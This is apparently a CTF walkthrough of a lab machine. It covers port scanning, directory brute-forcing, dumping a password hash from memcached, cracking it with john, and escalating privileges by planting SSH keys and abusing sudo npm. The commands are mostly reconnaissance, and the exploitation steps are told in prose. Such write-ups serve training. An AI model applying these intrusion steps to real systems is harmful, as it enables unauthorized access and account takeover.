Hey folks, Today we have an amazing machine in 0xL4ugh CTF competition
I’ve solved this machine with my friend Mohamed Saleh, Let’s get started…
Nmap Scan
We will start our scan with nmap
scan
nmap -p- -T4 -A <ip>
we have 3 open ports 22/80/11211
HTTP Enumeration
After opening the website over port 80
We have found that it contain the default page of the server
after using gobuster
to discover the directories
gobuster dir -u <ip> -w /path/to/wordlist
We have /robots.txt
and after checking its content
we have /note.txt
It contains username and the method which the passwords were hashed, okay nice
for the /hidden
directory
Let’s move to the next port
Memcached Enumeration
The third port is not familiar with us, it has a service called memcache
and after searching about it we’ve found this definition from Wikipedia
And after searching for how to attack it, we’ve found this amazing resource
We’ve followed him and use memc
tools, and I’ve found this file SuperSecureHiddenPassword
and I dumped its content as you can see
We’ve tried to crack it using hashcat/john
by using wordlist rockyou.txt
and we’ve found that it will take a long time with no results, so we searched about the method which we’ve found before in the /note
directory and discovered this amazing resource
We’ve created our wordlist and use it with john
to crack the hash and it works
The password is wertyuytyu
and we have a username from the note also
We can login with these credentials phoenix : wertyuytyu
We have 3 users and file which doesn’t have any useful information
Let’s try to escalate our privileges
I’ve found that I can execute a command as a jett
without asking me for a password
We’ve tried to copy our id_rsa
key into /home/jett/.ssh/authorized_keys
but it fails
After checking the config
file we’ve found this line
The file which should contain the rsa
public key called UsePAM
So, we have tried to copy our id_rsa
to home/jett/UsePAM
And then accessing the server with our private key
It works ❤
with the same method we can execute a command as brimstorm
The command is npm
and after searching for what’s npm
and how can it be dangerous, we’ve found this repo
We will try to escalate our privileges with the same way, copy our id_rsa
to the brimstorm
directory
We’ve downloaded the files and edited the evil command, and then run it as brimstorm
Let’s try to login using ssh
At the first I tried to decrypt this string, and it fails and after asking the support, they inform me that it’s the flag, and it was a trick :(